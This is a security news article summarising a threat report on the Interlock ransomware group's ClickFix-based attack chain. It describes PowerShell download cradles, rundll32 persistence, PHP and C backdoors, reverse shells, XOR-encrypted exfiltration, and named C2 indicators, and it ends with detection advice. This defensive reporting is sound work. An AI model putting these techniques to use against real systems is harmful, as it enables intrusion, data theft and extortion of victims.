Interlock Ransomware Uses ClickFix Exploit to Execute Malicious Commands on Windows
The Interlock ransomware group was connected to several sophisticated cyber incidents that targeted firms in North America and Europe, according to a recent report published in July 2025 by eSentire’s Threat Response Unit (TRU).
The group, active since September 2024, employs a multi-stage attack chain that begins with the exploitation of compromised websites, such as Kongtuke, to redirect victims to ClickFix pages.
This social engineering tactic tricks users into copying and executing malicious PowerShell commands disguised as fixes for technical issues, leading to fake error messages that mask the underlying infection.
Initial Access via Social Engineering
Once executed, the command initiates a download cradle, fetching additional payloads from command-and-control (C2) servers like dng-microsoftds.com, which then fingerprint the system using commands such as systeminfo.
This reconnaissance data is sent back to the C2 for analysis, checking for virtualization or sandbox environments.
If deemed safe, the attack progresses by deploying a “Simple Process Launcher” binary, often named c2.exe, which is persisted via a Windows shortcut in the startup folder and executed using the suspicious LOLBin rundll32 with shell32.dll’s ShellExec_RunDLL export.

This launcher spawns further PowerShell processes that download and invoke obfuscated scripts, ultimately installing a PHP interpreter to run a highly obfuscated backdoor stored as config.cfg in the AppData directory.
Multi-Layered Backdoors
The PHP-based backdoor serves as a versatile command handler, supporting operations like executing arbitrary commands via proc_open, downloading and running DLLs or EXEs disguised as PNG files, installing NodeJS for JavaScript payloads such as NodeSnake RAT, and establishing persistence through registry Run keys.
TRU observed Interlock leveraging this backdoor to deploy NodeSnake for data exfiltration, encoding sensitive files in base64 and staging them in C:UsersPublic as .log files, while collecting extensive system details, including drive information, process lists, and network interfaces via PowerShell queries converted to JSON.

Data encryption involves a Mersenne Twister-generated 32-bit XOR key, with iterative XOR operations against plaintext before GZip compression and transmission to dynamically generated C2 URLs featuring random path components.
Following this, a packed C-based backdoor, dropped as a .png file and executed via rundll32, takes over with self-injection techniques to evade detection, incorporating hardcoded C2 servers like 167.235.235.151 and fallback mechanisms storing encrypted backups in %temp%hiskeow.tmp.

This backdoor facilitates reverse shells by redirecting cmd.exe input/output over TCP 443 sockets, self-deletion using embedded DLLs launched with rundll32, and command execution with output logged to timestamped files in C:UsersPublic.
Commands range from evasion tactics, like freeing memory and sleeping, to updating C2 servers dynamically, with all communications encrypted via seeded rand() XOR keys and prefixed with markers like “55 11 69 DF” for JSON-formatted system fingerprints.
The attack’s complexity is evident in its massive process tree, involving anomalous command lines, LOLBins, and tools for reconnaissance, persistence, and exfiltration, culminating in ransomware deployment.
TRU’s analysis highlights Interlock’s use of custom tooling, including the misnamed “Interlock RAT” functioning primarily as a backdoor with support for nine core commands.
To mitigate such threats, organizations should monitor for suspicious PowerShell executions, unusual rundll32 usage, and unexpected PHP or NodeJS installations, while implementing behavioral detection for social engineering vectors like ClickFix.
eSentire’s TRU emphasizes proactive threat hunting and rapid response, noting that their 24/7 SOC achieves a 15-minute mean time to contain, underscoring the need for managed detection and response services to counter evolving ransomware tactics.
This discovery adds to Interlock’s history of high-profile exploits, reinforcing the importance of layered defenses against identity-based and supply-chain attacks.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link